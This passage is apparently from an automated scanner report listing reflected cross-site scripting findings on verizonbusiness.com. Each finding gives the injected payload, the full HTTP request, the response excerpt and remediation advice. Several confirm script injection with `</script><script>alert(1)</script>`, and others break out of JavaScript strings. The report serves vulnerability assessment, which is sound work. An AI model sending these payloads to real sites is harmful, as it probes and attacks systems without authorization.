User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources8c833';1bc556e0e8d/1002a2a9-111-Premises+Equipment.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.694. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1664"%3beb7c94892a2 was submitted in the REST URL parameter 1. This input was echoed as b1664";eb7c94892a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb1664"%3beb7c94892a2/1002a2a9-111-Premises+Equipment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:41 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb1664";eb7c94892a2/1002a2a9-111-Premises+Equipment.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.695. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f4a1</script><script>alert(1)</script>0add4c62c95 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a9-111-Premises+Equipment.xml5f4a1</script><script>alert(1)</script>0add4c62c95 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "060564b760eef90119bbfa831c564589"
Last-Modified: Wed, 17 Nov 2010 00:26:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d1763c98a-6207-4d8a-a2bd-17bf8b1416fe|VTID%3daf3707d3-4235-422e-b37b-1e7fd2c36773|SX%3d1289954779|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:03 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:19 GMT
Content-Length: 32805

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a9-111-Premises+Equipment.xml5f4a1</script><script>alert(1)</script>0add4c62c95</url>
...[SNIP]...

1.696. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e72da'%3ba38ca64e3cf was submitted in the REST URL parameter 2. This input was echoed as e72da';a38ca64e3cf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e72da'%3ba38ca64e3cf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/e72da';a38ca64e3cf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.697. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff23e'%3b1b7d0ac632a was submitted in the REST URL parameter 1. This input was echoed as ff23e';1b7d0ac632a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesff23e'%3b1b7d0ac632a/1002a3a1-111-Awards+and+Recognition.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesff23e';1b7d0ac632a/1002a3a1-111-Awards+and+Recognition.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.698. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65508"%3b00e3f62f07d was submitted in the REST URL parameter 1. This input was echoed as 65508";00e3f62f07d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources65508"%3b00e3f62f07d/1002a3a1-111-Awards+and+Recognition.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources65508";00e3f62f07d/1002a3a1-111-Awards+and+Recognition.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.699. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0</script><script>alert(1)</script>fd341f9eb10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a1-111-Awards+and+Recognition.xml1f6a0</script><script>alert(1)</script>fd341f9eb10 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "2f4ce0b4ee18d04a543fbc5a9c64d597"
Last-Modified: Wed, 17 Nov 2010 00:30:35 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 67384
Date: Wed, 17 Nov 2010 00:30:35 GMT
Connection: close
Set-Cookie: BERT=VRID%3d9740e137-d4ef-4591-89d7-1831e6f9752c|VTID%3d2298d78c-7dc4-4980-a7ae-7288dfd22240|SX%3d1289955034|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:18 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a3a1-111-Awards+and+Recognition.xml1f6a0</script><script>alert(1)</script>fd341f9eb10</url>
...[SNIP]...

1.700. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25ed6'%3b5e24dc073b5 was submitted in the REST URL parameter 2. This input was echoed as 25ed6';5e24dc073b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/25ed6'%3b5e24dc073b5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:36 GMT
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:30:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/25ed6';5e24dc073b5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.701. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcf1'%3b6d2160ac3cc was submitted in the REST URL parameter 1. This input was echoed as 6dcf1';6d2160ac3cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources6dcf1'%3b6d2160ac3cc/1002a3a10-111-Tools.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:29:09 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources6dcf1';6d2160ac3cc/1002a3a10-111-Tools.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.702. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bd5d"%3b90836918c73 was submitted in the REST URL parameter 1. This input was echoed as 8bd5d";90836918c73 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8bd5d"%3b90836918c73/1002a3a10-111-Tools.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:51 GMT
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8bd5d";90836918c73/1002a3a10-111-Tools.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.703. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcac7</script><script>alert(1)</script>fff0fe3d66e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a10-111-Tools.xmldcac7</script><script>alert(1)</script>fff0fe3d66e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "0925d1d35d73301914d390cc08b8eeb0"
Last-Modified: Wed, 17 Nov 2010 00:30:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:30:25 GMT
Content-Length: 28569
Connection: close
Set-Cookie: BERT=VRID%3d79cabeb8-1ab4-4ed1-9f07-90eb6136c520|VTID%3d0cff3359-5738-4db4-9683-6d66e8120c6e|SX%3d1289955023|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:07 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a3a10-111-Tools.xmldcac7</script><script>alert(1)</script>fff0fe3d66e</url>
...[SNIP]...

1.704. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c2a'%3bfb8c5f215e8 was submitted in the REST URL parameter 2. This input was echoed as 70c2a';fb8c5f215e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/70c2a'%3bfb8c5f215e8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/70c2a';fb8c5f215e8'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.705. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6089f'%3b4ad7cc726bd was submitted in the REST URL parameter 1. This input was echoed as 6089f';4ad7cc726bd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources6089f'%3b4ad7cc726bd/1002a3a11-111-Blogs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources6089f';4ad7cc726bd/1002a3a11-111-Blogs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.706. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a11-111-Blogs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aec4c"%3ba3e76068129 was submitted in the REST URL parameter 1. This input was echoed as aec4c";a3e76068129 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesaec4c"%3ba3e76068129/1002a3a11-111-Blogs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
